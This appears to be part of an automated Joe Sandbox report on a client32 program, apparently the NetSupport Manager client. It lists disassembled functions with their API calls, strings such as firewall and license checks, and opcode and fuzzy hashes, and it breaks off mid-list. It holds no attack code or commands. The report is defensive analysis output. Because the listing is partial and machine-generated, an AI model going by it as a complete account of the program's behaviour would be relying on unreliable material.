                                                                              Function 11010140 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                              • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                              • String ID: bad cast
                                                                              • API String ID: 2427920155-3145022300
                                                                              • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                              • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                              • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                              • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                              Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                              • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                              • API String ID: 3494822531-1878648853
                                                                              • Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                              • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                              • Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                              • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                              Function 6EF02F80 Relevance: 10.6, APIs: 7, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _calloc.LIBCMT ref: 6EF02FBB
                                                                              • GetTickCount.KERNEL32 ref: 6EF0300D
                                                                              • InterlockedExchange.KERNEL32(-00039761,00000000), ref: 6EF0301B
                                                                              • _calloc.LIBCMT ref: 6EF0303B
                                                                              • _memmove.LIBCMT ref: 6EF03049
                                                                              • InterlockedDecrement.KERNEL32(-000397B9), ref: 6EF0307F
                                                                              • SetEvent.KERNEL32(00000324,?,?,?,?,?,?,?,?,?,?,?,?,?,?,910C34B3), ref: 6EF0308C
                                                                                • Part of subcall function 6EF028D0: wsprintfA.USER32 ref: 6EF02965
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                              • String ID:
                                                                              • API String ID: 3178096747-0
                                                                              • Opcode ID: da6af0660be594885205ef7652514d0bca7652e261a577d6ed15724d567570f3
                                                                              • Instruction ID: 6b56f61eec0c222ee0723ab5c2f7e9da2cf132fcc87265c2ae74101508136519
                                                                              • Opcode Fuzzy Hash: da6af0660be594885205ef7652514d0bca7652e261a577d6ed15724d567570f3
                                                                              • Instruction Fuzzy Hash: 794176B6C05609AFDB10DFE9C854AEFB7FDAF88304F00851AE519E7240E7759645CBA0
                                                                              Function 1102A6D0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 101COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsJPIK.PCICHEK(EE49F673,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free_malloc_memsetwsprintf
                                                                              • String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
                                                                              • API String ID: 2814900446-469156069
                                                                              • Opcode ID: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
                                                                              • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                              • Opcode Fuzzy Hash: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
                                                                              • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
                                                                              Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 1101792C
                                                                              • CoInitialize.OLE32(00000000), ref: 11017935
                                                                              • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                              • CoUninitialize.OLE32 ref: 110179C0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                              • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                              • API String ID: 2407233060-578995875
                                                                              • Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                              • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                              • Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                              • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                              Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 11017842
                                                                              • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                              • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                              • CoUninitialize.OLE32 ref: 110178D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                              • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                              • API String ID: 2407233060-2037925671
                                                                              • Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                              • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                              • Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                              • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                              Function 11139600 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • AutoICFConfig, xrefs: 11139650
                                                                              • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                              • DoICFConfig() OK, xrefs: 111396D6
                                                                              • Client, xrefs: 11139655
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick
                                                                              • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                              • API String ID: 536389180-1512301160
                                                                              • Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                              • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                              • Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                              • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                              Function 6EEF9C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • send.WSOCK32(?,?,?,00000000), ref: 6EEF9C93
                                                                              • timeGetTime.WINMM(?,?,?,00000000), ref: 6EEF9CD0
                                                                              • Sleep.KERNEL32(00000000), ref: 6EEF9CDE
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 6EEF9D4F
                                                                              • InterlockedIncrement.KERNEL32(?), ref: 6EEF9D72
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                              • String ID: 3'
                                                                              • API String ID: 77915721-280543908
                                                                              • Opcode ID: a5c47354e0f3dbf1ff835951e36dd716ef1a62a57086cbab1acc88432293fc30
                                                                              • Instruction ID: b297e5681e58efaa4731b9ae62df935e0ba6c1774647668d2e1370a7e6c2f688
                                                                              • Opcode Fuzzy Hash: a5c47354e0f3dbf1ff835951e36dd716ef1a62a57086cbab1acc88432293fc30
                                                                              • Instruction Fuzzy Hash: 8D219F71A141198FDB21DFE4CC94BDAB3A5AF05314F218296D84D97281C736DD86CF91
                                                                              Function 11096D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                              • CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                              • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                              • CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                              • String ID: HNetCfg.FwMgr$ICF Present:
                                                                              • API String ID: 3222248624-258972079
                                                                              • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                              • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                              • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                              • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                              Function 110262F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                              • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                              • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                              • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                              • API String ID: 4186647306-532032230
                                                                              • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                              • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                              • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                              • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                              Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EDC3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                              • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                              • FindCloseChangeNotification.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
